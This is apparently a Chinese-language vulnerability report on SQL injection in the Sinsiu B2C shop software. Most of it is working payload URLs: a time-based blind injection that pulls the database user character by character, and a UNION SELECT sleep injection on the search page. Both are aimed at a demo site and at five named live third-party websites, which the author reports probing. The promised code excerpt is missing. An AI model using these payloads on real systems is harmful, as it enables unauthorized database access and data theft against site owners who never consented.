首先看效果
http://localhost:8080/sinsiu_b2c_1_0_3/upload/?/goods/cat-1*if(ascii(substr((select+user()from(b2c_varia)where(var_id=1)),1,1))=114,sleep(5),1)/
这样一来就可以遍历全站了
看看demo
http://b2c.demo.sinsiu.com/?/goods/cat-1*if(ascii(substr((select+user()from(b2c_varia)where(var_id=1)),1,1))=114,sleep(5),1)/
都可以造成延迟
代码:
goods_main.php:
第二处
第一处举例证明
1.http://tnkjw.com/?/goods/cat-1*if(1,sleep(5),1)/
2.http://www.ledpf.com/?/goods/cat-1*if(1,sleep(5),1)/
3.http://tnkjw.com/?/goods/cat-1*if(1,sleep(5),1)/
4.http://645.net.cn/?/goods/cat-1*if(1,sleep(1),1)/
5.http://www.nbcxaf.com/?/goods/cat-1*if(1,sleep(1),1)/
第二处举例证明,不知道怎么回事这些网站和实际demo测试反射出来的不是敏感信息
但是从另外一个方面还是可以证明sql注射存在:
1.http://tnkjw.com/?/search/index.html/cat-0/key-%25%27%20union%20select%20sleep%285%29%2Cuser%28%29%2Cuser%28%29%2Cuser%28%29%2Cuser%28%29%23/
2.http://www.ledpf.com/?/search/index.html/cat-0/key-%25%27%20union%20select%20sleep%285%29%2Cuser%28%29%2Cuser%28%29%2Cuser%28%29%2Cuser%28%29%23/
3.http://tnkjw.com/?/search/index.html/cat-0/key-%25%27%20union%20select%20sleep%285%29%2Cuser%28%29%2Cuser%28%29%2Cuser%28%29%2Cuser%28%29%23/
4.http://645.net.cn/?/search/index.html/cat-0/key-%25%27%20union%20select%20sleep%285%29%2Cuser%28%29%2Cuser%28%29%2Cuser%28%29%2Cuser%28%29%23/
5.http://www.nbcxaf.com/?/search/index.html/cat-0/key-%25%27%20union%20select%20sleep%285%29%2Cuser%28%29%2Cuser%28%29%2Cuser%28%29%2Cuser%28%29%23/
都造成五秒延迟